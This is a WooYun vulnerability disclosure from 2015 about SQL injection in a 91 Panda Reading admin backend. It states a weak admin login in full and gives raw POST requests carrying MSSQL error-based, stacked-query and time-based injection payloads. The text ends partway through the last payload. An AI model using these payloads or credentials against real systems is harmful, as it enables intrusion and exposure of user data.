当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0157856

漏洞标题:91熊猫看书某重要系统MSSQL注入(涉及2000+W用户信息)

相关厂商:福建网龙

漏洞作者: Looke

提交时间:2015-12-03 08:38

修复时间:2016-01-17 11:02

公开时间:2016-01-17 11:02

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-12-03: 细节已通知厂商并且等待厂商处理中
2015-12-03: 厂商已经确认,细节仅向厂商公开
2015-12-13: 细节向核心白帽子及相关领域专家公开
2015-12-23: 细节向普通白帽子公开
2016-01-02: 细节向实习白帽子公开
2016-01-17: 细节向公众公开

简要描述:

RT

详细说明:

漏洞系统:http://boss.ks.91.com/
弱口令:wanghuan 123456
登入系统:

1.png


能干的事情实在太多,比如可以给任意用户补偿熊猫币,任意账户查询,随意下架书籍、添加广告等等。

2.png


这都不是重点,随意找一个搜索框,发现都是注入

221.png


POST /Push/PandaPushMessage.aspx?_dc=1449074954365 HTTP/1.1
Host: boss.ks.91.com
Proxy-Connection: keep-alive
Content-Length: 5155
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://boss.ks.91.com
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryh5dqQ61NBdyh41V2
Referer: http://boss.ks.91.com/Push/PandaPushMessage.aspx
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: ASP.NET_SessionId=ikomqye14ftpkiaedbebwhc3
------WebKitFormBoundaryh5dqQ61NBdyh41V2
Content-Disposition: form-data; name="MainContent_txtTitle"
1*
------WebKitFormBoundaryh5dqQ61NBdyh41V2
Content-Disposition: form-data; name="MainContent_ptbSpendData_ActivePage"
1
------WebKitFormBoundaryh5dqQ61NBdyh41V2
Content-Disposition: form-data; name="__EVENTTARGET"
ctl00$rmCurrent
------WebKitFormBoundaryh5dqQ61NBdyh41V2
Content-Disposition: form-data; name="__EVENTARGUMENT"
MainContent_dataStore|postback|refresh
------WebKitFormBoundaryh5dqQ61NBdyh41V2
Content-Disposition: form-data; name="__VIEWSTATE"
/wEPDwULLTE1MzgzMzgyMzMPZBYCZg9kFgICAw9kFgICAw9kFgQCAw9kFgRmD2QWAmYPFgIeBWNsYXNzBQh4LWhpZGRlbmQCAQ9kFgICAQ8UKhJTeXN0ZW0uV2ViLlVJLlBhaXIBDwUJdnNNZW1iZXJzFCsAAg8FDkF1dG9Mb2FkUGFyYW1zDwICFCsAAhQrBAEPBQRiYXNlFgYeBE5hbWUFBXN0YXJ0HgVWYWx1ZQUBMB4ETW9kZQspZUV4dC5OZXQuUGFyYW1ldGVyTW9kZSwgRXh0Lk5ldCwgVmVyc2lvbj0xLjIuMC4zMjE5OSwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj0yZTEyY2UzZDAxNzZjZDg3ABQrBAEPBQRiYXNlFgYfAQUFbGltaXQfAgUDMTAwHwMLKwUADwUGUmVhZGVyFCsEAQ8FBGJhc2UWBh4NVG90YWxQcm9wZXJ0eQUFdG90YWweBFJvb3QFBGRhdGEeCklEUHJvcGVydHkFAklEZAIFD2QWAgIBD2QWBGYPZBYCZg8WAh8ABQh4LWhpZGRlbmQCAQ9kFgJmDxYCHwAFCHgtaGlkZGVuFgQCBQ8UKwQBDwUJdnNNZW1iZXJzFCsAAQ8FBUl0ZW1zDwIEFCsABBQrBAEPBQRiYXNlFgQeBFRleHQFDOaJgOacieW5s+WPsB8CBQI5ORQrBAEPBQRiYXNlFgQfBwUMSVBob25l5bmz5Y+wHwIFATEUKwQBDwUEYmFzZRYEHwcFGOWuieWNk+aWsOeJiChWNi4y5LmL5ZCOKR8CBQE0FCsEAQ8FBGJhc2UWBB8HBRjlronljZPml6fniYgoVjYuMuS5i+WJjSkfAgUCNDRkAgkPFCsEAQ8FCXZzTWVtYmVycxQrAAEPBQVJdGVtcw8CARQrAAEUKwQBDwUEYmFzZRYEHwcFCeWFqOaYvuekuh8CBQEwZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WFgUPY3RsMDAkcm1DdXJyZW50BRxjdGwwMCRNYWluQ29udGVudCRGb3JtYXRUeXBlBRljdGwwMCRNYWluQ29udGVudCRwbFF1ZXJ5BRpjdGwwMCRNYWluQ29udGVudCR0eHRUaXRsZQUaY3RsMDAkTWFpbkNvbnRlbnQkYnRuUXVlcnkFGGN0bDAwJE1haW5Db250ZW50JGJ0bkFkZAUYY3RsMDAkTWFpbkNvbnRlbnQkZ3BMaXN0BR5jdGwwMCRNYWluQ29udGVudCRwdGJTcGVuZERhdGEFJmN0bDAwJE1haW5Db250ZW50JFBhbmRhUHVzaEVkaXQxJElzQWRkBSljdGwwMCRNYWluQ29udGVudCRQYW5kYVB1c2hFZGl0MSR3ZEVkaXRvcgUnY3RsMDAkTWFpbkNvbnRlbnQkUGFuZGFQdXNoRWRpdDEkUGFuZWwyBSdjdGwwMCRNYWluQ29udGVudCRQYW5kYVB1c2hFZGl0MSRQYW5lbDEFJmN0bDAwJE1haW5Db250ZW50JFBhbmRhUHVzaEVkaXQxJHR4dElEBSljdGwwMCRNYWluQ29udGVudCRQYW5kYVB1c2hFZGl0MSR0eHRUaXRsZQUyY3RsMDAkTWFpbkNvbnRlbnQkUGFuZGFQdXNoRWRpdDEkY21iTW9iaWxlVHlwZU5hbWUFJ2N0bDAwJE1haW5Db250ZW50JFBhbmRhUHVzaEVkaXQxJHR4dFVybAUnY3RsMDAkTWFpbkNvbnRlbnQkUGFuZGFQdXNoRWRpdDEkY2JUeXBlBStjdGwwMCRNYWluQ29udGVudCRQYW5kYVB1c2hFZGl0MSR0eHRDb250ZWN0BStjdGwwMCRNYWluQ29udGVudCRQYW5kYVB1c2hFZGl0MSR0eHRVc2VySURTBS5jdGwwMCRNYWluQ29udGVudCRQYW5kYVB1c2hFZGl0MSR0eHRDcmVhdGVUaW1lBShjdGwwMCRNYWluQ29udGVudCRQYW5kYVB1c2hFZGl0MSRidG5TYXZlBSpjdGwwMCRNYWluQ29udGVudCRQYW5kYVB1c2hFZGl0MSRidG5DYW5jZWwU8tG6ilBkzDVP72wtYtqI58JWcGS8hhWomcbtRbsFAQ==
------WebKitFormBoundaryh5dqQ61NBdyh41V2
Content-Disposition: form-data; name="__EVENTVALIDATION"
/wEWAgL5iZXwBQKd1pjuDkM/WynfA4ziA8/WZZmj9lyJWiisVwefIce/r3hKDRee
------WebKitFormBoundaryh5dqQ61NBdyh41V2
Content-Disposition: form-data; name="MainContent_FormatType"
------WebKitFormBoundaryh5dqQ61NBdyh41V2
Content-Disposition: form-data; name="MainContent_PandaPushEdit1_IsAdd"
------WebKitFormBoundaryh5dqQ61NBdyh41V2
Content-Disposition: form-data; name="MainContent_gpList_SM"
------WebKitFormBoundaryh5dqQ61NBdyh41V2
Content-Disposition: form-data; name="MainContent_PandaPushEdit1_txtID"
------WebKitFormBoundaryh5dqQ61NBdyh41V2
Content-Disposition: form-data; name="MainContent_PandaPushEdit1_txtTitle"
------WebKitFormBoundaryh5dqQ61NBdyh41V2
Content-Disposition: form-data; name="MainContent_PandaPushEdit1_cmbMobileTypeName_Value"
------WebKitFormBoundaryh5dqQ61NBdyh41V2
Content-Disposition: form-data; name="MainContent_PandaPushEdit1_cmbMobileTypeName"
------WebKitFormBoundaryh5dqQ61NBdyh41V2
Content-Disposition: form-data; name="MainContent_PandaPushEdit1_cmbMobileTypeName_SelIndex"
------WebKitFormBoundaryh5dqQ61NBdyh41V2
Content-Disposition: form-data; name="MainContent_PandaPushEdit1_txtUrl"
------WebKitFormBoundaryh5dqQ61NBdyh41V2
Content-Disposition: form-data; name="MainContent_PandaPushEdit1_cbType_Value"
0
------WebKitFormBoundaryh5dqQ61NBdyh41V2
Content-Disposition: form-data; name="MainContent_PandaPushEdit1_cbType"
全显示
------WebKitFormBoundaryh5dqQ61NBdyh41V2
Content-Disposition: form-data; name="MainContent_PandaPushEdit1_cbType_SelIndex"
0
------WebKitFormBoundaryh5dqQ61NBdyh41V2
Content-Disposition: form-data; name="MainContent_PandaPushEdit1_txtContect"
------WebKitFormBoundaryh5dqQ61NBdyh41V2
Content-Disposition: form-data; name="MainContent_PandaPushEdit1_txtUserIDS"
备注:以英文 , 分隔
------WebKitFormBoundaryh5dqQ61NBdyh41V2
Content-Disposition: form-data; name="MainContent_PandaPushEdit1_txtCreateTime"
------WebKitFormBoundaryh5dqQ61NBdyh41V2
Content-Disposition: form-data; name="submitDirectEventConfig"
{"config":{"extraParams":{"start":0,"limit":100,"sort":"ID","dir":"ASC"}}}
------WebKitFormBoundaryh5dqQ61NBdyh41V2
Content-Disposition: form-data; name="__ExtNetDirectEventMarker"
delta=true
------WebKitFormBoundaryh5dqQ61NBdyh41V2--


各种注入类型

---
Parameter: #1* ((custom) POST)
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: ------WebKitFormBoundarydEuFUCx2QXyzCtlV
Content-Disposition: form-data; name="MainContent_txtTitle"
1' AND 1996=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(118)+CHAR(112)+CHAR(113
)+(SELECT (CASE WHEN (1996=1996) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHA
R(106)+CHAR(118)+CHAR(118)+CHAR(113))) AND 'NsVd' LIKE 'NsVd
------WebKitFormBoundarydEuFUCx2QXyzCtlV
Content-Disposition: form-data; name="MainContent_ptbSpendData_ActivePage"
1
------WebKitFormBoundarydEuFUCx2QXyzCtlV
Content-Disposition: form-data; name="__EVENTTARGET"
ctl00$rmCurrent
------WebKitFormBoundarydEuFUCx2QXyzCtlV
Content-Disposition: form-data; name="__EVENTARGUMENT"
MainContent_dataStore|postback|refresh
------WebKitFormBoundarydEuFUCx2QXyzCtlV
Content-Disposition: form-data; name="__VIEWSTATE"
/wEPDwULLTE1MzgzMzgyMzMPZBYCZg9kFgICAw9kFgICAw9kFgQCAw9kFgRmD2QWAmYPFgIeBWNsYXNz
BQh4LWhpZGRlbmQCAQ9kFgICAQ8UKhJTeXN0ZW0uV2ViLlVJLlBhaXIBDwUJdnNNZW1iZXJzFCsAAg8F
DkF1dG9Mb2FkUGFyYW1zDwICFCsAAhQrBAEPBQRiYXNlFgYeBE5hbWUFBXN0YXJ0HgVWYWx1ZQUBMB4E
TW9kZQspZUV4dC5OZXQuUGFyYW1ldGVyTW9kZSwgRXh0Lk5ldCwgVmVyc2lvbj0xLjIuMC4zMjE5OSwg
Q3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj0yZTEyY2UzZDAxNzZjZDg3ABQrBAEPBQRiYXNl
FgYfAQUFbGltaXQfAgUDMTAwHwMLKwUADwUGUmVhZGVyFCsEAQ8FBGJhc2UWBh4NVG90YWxQcm9wZXJ0
eQUFdG90YWweBFJvb3QFBGRhdGEeCklEUHJvcGVydHkFAklEZAIFD2QWAgIBD2QWBGYPZBYCZg8WAh8A
BQh4LWhpZGRlbmQCAQ9kFgJmDxYCHwAFCHgtaGlkZGVuFgQCBQ8UKwQBDwUJdnNNZW1iZXJzFCsAAQ8F
BUl0ZW1zDwIEFCsABBQrBAEPBQRiYXNlFgQeBFRleHQFDOaJgOacieW5s+WPsB8CBQI5ORQrBAEPBQRi
YXNlFgQfBwUMSVBob25l5bmz5Y+wHwIFATEUKwQBDwUEYmFzZRYEHwcFGOWuieWNk+aWsOeJiChWNi4y
5LmL5ZCOKR8CBQE0FCsEAQ8FBGJhc2UWBB8HBRjlronljZPml6fniYgoVjYuMuS5i+WJjSkfAgUCNDRk
AgkPFCsEAQ8FCXZzTWVtYmVycxQrAAEPBQVJdGVtcw8CARQrAAEUKwQBDwUEYmFzZRYEHwcFCeWFqOaY
vuekuh8CBQEwZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WFgUPY3RsMDAkcm1DdXJy
ZW50BRxjdGwwMCRNYWluQ29udGVudCRGb3JtYXRUeXBlBRljdGwwMCRNYWluQ29udGVudCRwbFF1ZXJ5
BRpjdGwwMCRNYWluQ29udGVudCR0eHRUaXRsZQUaY3RsMDAkTWFpbkNvbnRlbnQkYnRuUXVlcnkFGGN0
bDAwJE1haW5Db250ZW50JGJ0bkFkZAUYY3RsMDAkTWFpbkNvbnRlbnQkZ3BMaXN0BR5jdGwwMCRNYWlu
Q29udGVudCRwdGJTcGVuZERhdGEFJmN0bDAwJE1haW5Db250ZW50JFBhbmRhUHVzaEVkaXQxJElzQWRk
BSljdGwwMCRNYWluQ29udGVudCRQYW5kYVB1c2hFZGl0MSR3ZEVkaXRvcgUnY3RsMDAkTWFpbkNvbnRl
bnQkUGFuZGFQdXNoRWRpdDEkUGFuZWwyBSdjdGwwMCRNYWluQ29udGVudCRQYW5kYVB1c2hFZGl0MSRQ
YW5lbDEFJmN0bDAwJE1haW5Db250ZW50JFBhbmRhUHVzaEVkaXQxJHR4dElEBSljdGwwMCRNYWluQ29u
dGVudCRQYW5kYVB1c2hFZGl0MSR0eHRUaXRsZQUyY3RsMDAkTWFpbkNvbnRlbnQkUGFuZGFQdXNoRWRp
dDEkY21iTW9iaWxlVHlwZU5hbWUFJ2N0bDAwJE1haW5Db250ZW50JFBhbmRhUHVzaEVkaXQxJHR4dFVy
bAUnY3RsMDAkTWFpbkNvbnRlbnQkUGFuZGFQdXNoRWRpdDEkY2JUeXBlBStjdGwwMCRNYWluQ29udGVu
dCRQYW5kYVB1c2hFZGl0MSR0eHRDb250ZWN0BStjdGwwMCRNYWluQ29udGVudCRQYW5kYVB1c2hFZGl0
MSR0eHRVc2VySURTBS5jdGwwMCRNYWluQ29udGVudCRQYW5kYVB1c2hFZGl0MSR0eHRDcmVhdGVUaW1l
BShjdGwwMCRNYWluQ29udGVudCRQYW5kYVB1c2hFZGl0MSRidG5TYXZlBSpjdGwwMCRNYWluQ29udGVu
dCRQYW5kYVB1c2hFZGl0MSRidG5DYW5jZWwU8tG6ilBkzDVP72wtYtqI58JWcGS8hhWomcbtRbsFAQ==
------WebKitFormBoundarydEuFUCx2QXyzCtlV
Content-Disposition: form-data; name="__EVENTVALIDATION"
/wEWAgL5iZXwBQKd1pjuDkM/WynfA4ziA8/WZZmj9lyJWiisVwefIce/r3hKDRee
------WebKitFormBoundarydEuFUCx2QXyzCtlV
Content-Disposition: form-data; name="MainContent_FormatType"
------WebKitFormBoundarydEuFUCx2QXyzCtlV
Content-Disposition: form-data; name="MainContent_PandaPushEdit1_IsAdd"
------WebKitFormBoundarydEuFUCx2QXyzCtlV
Content-Disposition: form-data; name="MainContent_gpList_SM"
------WebKitFormBoundarydEuFUCx2QXyzCtlV
Content-Disposition: form-data; name="MainContent_PandaPushEdit1_txtID"
------WebKitFormBoundarydEuFUCx2QXyzCtlV
Content-Disposition: form-data; name="MainContent_PandaPushEdit1_txtTitle"
------WebKitFormBoundarydEuFUCx2QXyzCtlV
Content-Disposition: form-data; name="MainContent_PandaPushEdit1_cmbMobileTypeNa
me_Value"
------WebKitFormBoundarydEuFUCx2QXyzCtlV
Content-Disposition: form-data; name="MainContent_PandaPushEdit1_cmbMobileTypeNa
me"
------WebKitFormBoundarydEuFUCx2QXyzCtlV
Content-Disposition: form-data; name="MainContent_PandaPushEdit1_cmbMobileTypeNa
me_SelIndex"
------WebKitFormBoundarydEuFUCx2QXyzCtlV
Content-Disposition: form-data; name="MainContent_PandaPushEdit1_txtUrl"
------WebKitFormBoundarydEuFUCx2QXyzCtlV
Content-Disposition: form-data; name="MainContent_PandaPushEdit1_cbType_Value"
0
------WebKitFormBoundarydEuFUCx2QXyzCtlV
Content-Disposition: form-data; name="MainContent_PandaPushEdit1_cbType"
全显示
------WebKitFormBoundarydEuFUCx2QXyzCtlV
Content-Disposition: form-data; name="MainContent_PandaPushEdit1_cbType_SelIndex
"
0
------WebKitFormBoundarydEuFUCx2QXyzCtlV
Content-Disposition: form-data; name="MainContent_PandaPushEdit1_txtContect"
------WebKitFormBoundarydEuFUCx2QXyzCtlV
Content-Disposition: form-data; name="MainContent_PandaPushEdit1_txtUserIDS"
备注:以英文 , 分隔
------WebKitFormBoundarydEuFUCx2QXyzCtlV
Content-Disposition: form-data; name="MainContent_PandaPushEdit1_txtCreateTime"
------WebKitFormBoundarydEuFUCx2QXyzCtlV
Content-Disposition: form-data; name="submitDirectEventConfig"
{"config":{"extraParams":{"start":0,"limit":100,"sort":"ID","dir":"ASC"}}}
------WebKitFormBoundarydEuFUCx2QXyzCtlV
Content-Disposition: form-data; name="__ExtNetDirectEventMarker"
delta=true
------WebKitFormBoundarydEuFUCx2QXyzCtlV--
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: ------WebKitFormBoundarydEuFUCx2QXyzCtlV
Content-Disposition: form-data; name="MainContent_txtTitle"
1';WAITFOR DELAY '0:0:5'--
------WebKitFormBoundarydEuFUCx2QXyzCtlV
Content-Disposition: form-data; name="MainContent_ptbSpendData_ActivePage"
1
------WebKitFormBoundarydEuFUCx2QXyzCtlV
Content-Disposition: form-data; name="__EVENTTARGET"
ctl00$rmCurrent
------WebKitFormBoundarydEuFUCx2QXyzCtlV
Content-Disposition: form-data; name="__EVENTARGUMENT"
MainContent_dataStore|postback|refresh
------WebKitFormBoundarydEuFUCx2QXyzCtlV
Content-Disposition: form-data; name="__VIEWSTATE"
/wEPDwULLTE1MzgzMzgyMzMPZBYCZg9kFgICAw9kFgICAw9kFgQCAw9kFgRmD2QWAmYPFgIeBWNsYXNz
BQh4LWhpZGRlbmQCAQ9kFgICAQ8UKhJTeXN0ZW0uV2ViLlVJLlBhaXIBDwUJdnNNZW1iZXJzFCsAAg8F
DkF1dG9Mb2FkUGFyYW1zDwICFCsAAhQrBAEPBQRiYXNlFgYeBE5hbWUFBXN0YXJ0HgVWYWx1ZQUBMB4E
TW9kZQspZUV4dC5OZXQuUGFyYW1ldGVyTW9kZSwgRXh0Lk5ldCwgVmVyc2lvbj0xLjIuMC4zMjE5OSwg
Q3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj0yZTEyY2UzZDAxNzZjZDg3ABQrBAEPBQRiYXNl
FgYfAQUFbGltaXQfAgUDMTAwHwMLKwUADwUGUmVhZGVyFCsEAQ8FBGJhc2UWBh4NVG90YWxQcm9wZXJ0
eQUFdG90YWweBFJvb3QFBGRhdGEeCklEUHJvcGVydHkFAklEZAIFD2QWAgIBD2QWBGYPZBYCZg8WAh8A
BQh4LWhpZGRlbmQCAQ9kFgJmDxYCHwAFCHgtaGlkZGVuFgQCBQ8UKwQBDwUJdnNNZW1iZXJzFCsAAQ8F
BUl0ZW1zDwIEFCsABBQrBAEPBQRiYXNlFgQeBFRleHQFDOaJgOacieW5s+WPsB8CBQI5ORQrBAEPBQRi
YXNlFgQfBwUMSVBob25l5bmz5Y+wHwIFATEUKwQBDwUEYmFzZRYEHwcFGOWuieWNk+aWsOeJiChWNi4y
5LmL5ZCOKR8CBQE0FCsEAQ8FBGJhc2UWBB8HBRjlronljZPml6fniYgoVjYuMuS5i+WJjSkfAgUCNDRk
AgkPFCsEAQ8FCXZzTWVtYmVycxQrAAEPBQVJdGVtcw8CARQrAAEUKwQBDwUEYmFzZRYEHwcFCeWFqOaY
vuekuh8CBQEwZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WFgUPY3RsMDAkcm1DdXJy
ZW50BRxjdGwwMCRNYWluQ29udGVudCRGb3JtYXRUeXBlBRljdGwwMCRNYWluQ29udGVudCRwbFF1ZXJ5
BRpjdGwwMCRNYWluQ29udGVudCR0eHRUaXRsZQUaY3RsMDAkTWFpbkNvbnRlbnQkYnRuUXVlcnkFGGN0
bDAwJE1haW5Db250ZW50JGJ0bkFkZAUYY3RsMDAkTWFpbkNvbnRlbnQkZ3BMaXN0BR5jdGwwMCRNYWlu
Q29udGVudCRwdGJTcGVuZERhdGEFJmN0bDAwJE1haW5Db250ZW50JFBhbmRhUHVzaEVkaXQxJElzQWRk
BSljdGwwMCRNYWluQ29udGVudCRQYW5kYVB1c2hFZGl0MSR3ZEVkaXRvcgUnY3RsMDAkTWFpbkNvbnRl
bnQkUGFuZGFQdXNoRWRpdDEkUGFuZWwyBSdjdGwwMCRNYWluQ29udGVudCRQYW5kYVB1c2hFZGl0MSRQ
YW5lbDEFJmN0bDAwJE1haW5Db250ZW50JFBhbmRhUHVzaEVkaXQxJHR4dElEBSljdGwwMCRNYWluQ29u
dGVudCRQYW5kYVB1c2hFZGl0MSR0eHRUaXRsZQUyY3RsMDAkTWFpbkNvbnRlbnQkUGFuZGFQdXNoRWRp
dDEkY21iTW9iaWxlVHlwZU5hbWUFJ2N0bDAwJE1haW5Db250ZW50JFBhbmRhUHVzaEVkaXQxJHR4dFVy
bAUnY3RsMDAkTWFpbkNvbnRlbnQkUGFuZGFQdXNoRWRpdDEkY2JUeXBlBStjdGwwMCRNYWluQ29udGVu
dCRQYW5kYVB1c2hFZGl0MSR0eHRDb250ZWN0BStjdGwwMCRNYWluQ29udGVudCRQYW5kYVB1c2hFZGl0
MSR0eHRVc2VySURTBS5jdGwwMCRNYWluQ29udGVudCRQYW5kYVB1c2hFZGl0MSR0eHRDcmVhdGVUaW1l
BShjdGwwMCRNYWluQ29udGVudCRQYW5kYVB1c2hFZGl0MSRidG5TYXZlBSpjdGwwMCRNYWluQ29udGVu
dCRQYW5kYVB1c2hFZGl0MSRidG5DYW5jZWwU8tG6ilBkzDVP72wtYtqI58JWcGS8hhWomcbtRbsFAQ==
------WebKitFormBoundarydEuFUCx2QXyzCtlV
Content-Disposition: form-data; name="__EVENTVALIDATION"
/wEWAgL5iZXwBQKd1pjuDkM/WynfA4ziA8/WZZmj9lyJWiisVwefIce/r3hKDRee
------WebKitFormBoundarydEuFUCx2QXyzCtlV
Content-Disposition: form-data; name="MainContent_FormatType"
------WebKitFormBoundarydEuFUCx2QXyzCtlV
Content-Disposition: form-data; name="MainContent_PandaPushEdit1_IsAdd"
------WebKitFormBoundarydEuFUCx2QXyzCtlV
Content-Disposition: form-data; name="MainContent_gpList_SM"
------WebKitFormBoundarydEuFUCx2QXyzCtlV
Content-Disposition: form-data; name="MainContent_PandaPushEdit1_txtID"
------WebKitFormBoundarydEuFUCx2QXyzCtlV
Content-Disposition: form-data; name="MainContent_PandaPushEdit1_txtTitle"
------WebKitFormBoundarydEuFUCx2QXyzCtlV
Content-Disposition: form-data; name="MainContent_PandaPushEdit1_cmbMobileTypeNa
me_Value"
------WebKitFormBoundarydEuFUCx2QXyzCtlV
Content-Disposition: form-data; name="MainContent_PandaPushEdit1_cmbMobileTypeNa
me"
------WebKitFormBoundarydEuFUCx2QXyzCtlV
Content-Disposition: form-data; name="MainContent_PandaPushEdit1_cmbMobileTypeNa
me_SelIndex"
------WebKitFormBoundarydEuFUCx2QXyzCtlV
Content-Disposition: form-data; name="MainContent_PandaPushEdit1_txtUrl"
------WebKitFormBoundarydEuFUCx2QXyzCtlV
Content-Disposition: form-data; name="MainContent_PandaPushEdit1_cbType_Value"
0
------WebKitFormBoundarydEuFUCx2QXyzCtlV
Content-Disposition: form-data; name="MainContent_PandaPushEdit1_cbType"
全显示
------WebKitFormBoundarydEuFUCx2QXyzCtlV
Content-Disposition: form-data; name="MainContent_PandaPushEdit1_cbType_SelIndex
"
0
------WebKitFormBoundarydEuFUCx2QXyzCtlV
Content-Disposition: form-data; name="MainContent_PandaPushEdit1_txtContect"
------WebKitFormBoundarydEuFUCx2QXyzCtlV
Content-Disposition: form-data; name="MainContent_PandaPushEdit1_txtUserIDS"
备注:以英文 , 分隔
------WebKitFormBoundarydEuFUCx2QXyzCtlV
Content-Disposition: form-data; name="MainContent_PandaPushEdit1_txtCreateTime"
------WebKitFormBoundarydEuFUCx2QXyzCtlV
Content-Disposition: form-data; name="submitDirectEventConfig"
{"config":{"extraParams":{"start":0,"limit":100,"sort":"ID","dir":"ASC"}}}
------WebKitFormBoundarydEuFUCx2QXyzCtlV
Content-Disposition: form-data; name="__ExtNetDirectEventMarker"
delta=true
------WebKitFormBoundarydEuFUCx2QXyzCtlV--
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind (comment)
    Payload: ------WebKitFormBoundarydEuFUCx2QXyzCtlV
Content-Disposition: form-data; name="MainContent_txtTitle"
1' WAITFOR DELAY '0:0:5'--
------WebKitFormBoundarydEuFUCx2QXyzCtlV
Content-Disposition: form-data; name="MainContent_ptbSpendData_ActivePage"
1
------WebKitFormBoundarydEuFUCx2QXyzCtlV
Content-Disposition: form-data; name="__EVENTTARGET"
ctl00$rmCurrent
------WebKitFormBoundarydEuFUCx2QXyzCtlV
Content-Disposition: form-data; name="__EVENTARGUMENT"
MainContent_dataStore|postback|refresh
------WebKitFormBoundarydEuFUCx2QXyzCtlV
Content-Disposition: form-data; name="__VIEWSTATE"
/wEPDwULLTE1MzgzMzgyMzMPZBYCZg9kFgICAw9kFgICAw9kFgQCAw9kFgRmD2QWAmYPFgIeBWNsYXNz
BQh4LWhpZGRlbmQCAQ9kFgICAQ8UKhJTeXN0ZW0uV2ViLlVJLlBhaXIBDwUJdnNNZW1iZXJzFCsAAg8F
DkF1dG9Mb2FkUGFyYW1zDwICFCsAAhQrBAEPBQRiYXNlFgYeBE5hbWUFBXN0YXJ0HgVWYWx1ZQUBMB4E
TW9kZQspZUV4dC5OZXQuUGFyYW1ldGVyTW9kZSwgRXh0Lk5ldCwgVmVyc2lvbj0xLjIuMC4zMjE5OSwg
Q3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj0yZTEyY2UzZDAxNzZjZDg3ABQrBAEPBQRiYXNl
FgYfAQUFbGltaXQfAgUDMTAwHwMLKwUADwUGUmVhZGVyFCsEAQ8FBGJhc2UWBh4NVG90YWxQcm9wZXJ0
eQUFdG90YWweBFJvb3QFBGRhdGEeCklEUHJvcGVydHkFAklEZAIFD2QWAgIBD2QWBGYPZBYCZg8WAh8A
BQh4LWhpZGRlbmQCAQ9kFgJmDxYCHwAFCHgtaGlkZGVuFgQCBQ8UKwQBDwUJdnNNZW1iZXJzFCsAAQ8F
BUl0ZW1zDwIEFCsABBQrBAEPBQRiYXNlFgQeBFRleHQFDOaJgOacieW5s+WPsB8CBQI5ORQrBAEPBQRi
YXNlFgQfBwUMSVBob25l5bmz5Y+wHwIFATEUKwQBDwUEYmFzZRYEHwcFGOWuieWNk+aWsOeJiChWNi4y
5LmL5ZCOKR8CBQE0FCsEAQ8FBGJhc2UWBB8HBRjlronljZPml6fniYgoVjYuMuS5i+WJjSkfAgUCNDRk
AgkPFCsEAQ8FCXZzTWVtYmVycxQrAAEPBQVJdGVtcw8CARQrAAEUKwQBDwUEYmFzZRYEHwcFCeWFqOaY
vuekuh8CBQEwZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WFgUPY3RsMDAkcm1DdXJy
ZW50BRxjdGwwMCRNYWluQ29udGVudCRGb3JtYXRUeXBlBRljdGwwMCRNYWluQ29udGVudCRwbFF1ZXJ5
BRpjdGwwMCRNYWluQ29udGVudCR0eHRUaXRsZQUaY3RsMDAkTWFpbkNvbnRlbnQkYnRuUXVlcnkFGGN0
bDAwJE1haW5Db250ZW50JGJ0bkFkZAUYY3RsMDAkTWFpbkNvbnRlbnQkZ3BMaXN0BR5jdGwwMCRNYWlu
Q29udGVudCRwdGJTcGVuZERhdGEFJmN0bDAwJE1haW5Db250ZW50JFBhbmRhUHVzaEVkaXQxJElzQWRk
BSljdGwwMCRNYWluQ29udGVudCRQYW5kYVB1c2hFZGl0MSR3ZEVkaXRvcgUnY3RsMDAkTWFpbkNvbnRl
bnQkUGFuZGFQdXNoRWRpdDEkUGFuZWwyBSdjdGwwMCRNYWluQ29udGVudCRQYW5kYVB1c2hFZGl0MSRQ
YW5lbDEFJmN0bDAwJE1haW5Db250ZW50JFBhbmRhUHVzaEVkaXQxJHR4dElEBSljdGwwMCRNYWluQ29u
dGVudCRQYW5kYVB1c2hFZGl0MSR0eHRUaXRsZQUyY3RsMDAkTWFpbkNvbnRlbnQkUGFuZGFQdXNoRWRp
dDEkY21iTW9iaWxlVHlwZU5hbWUFJ2N0bDAwJE1haW5Db250ZW50JFBhbmRhUHVzaEVkaXQxJHR4dFVy
bAUnY3RsMDAkTWFpbkNvbnRlbnQkUGFuZGFQdXNoRWRpdDEkY2JUeXBlBStjdGwwMCRNYWluQ29udGVu
dCRQYW5kYVB1c2hFZGl0MSR0eHRDb250ZWN0BStjdGwwMCRNYWluQ29udGVudCRQYW5kYVB1c2hFZGl0
MSR0eHRVc2VySURTBS5jdGwwMCRNYWluQ29udGVudCRQYW5kYVB1c2hFZGl0MSR0eHRDcmVhdGVUaW1l
BShjdGwwMCRNYWluQ29udGVudCRQYW5kYVB1c2hFZGl0MSRidG5TYXZlBSpjdGwwMCRNYWluQ29udGVu
dCRQYW5kYVB1c2hFZGl0MSRidG5DYW5jZWwU8tG6ilBkzDVP72wtYtqI58JWcGS8hhWomcbtRbsFAQ==
------WebKitFormBoundarydEuFUCx2QXyzCtlV
Content-Disposition: form-data; name="__EVENTVALIDATION"
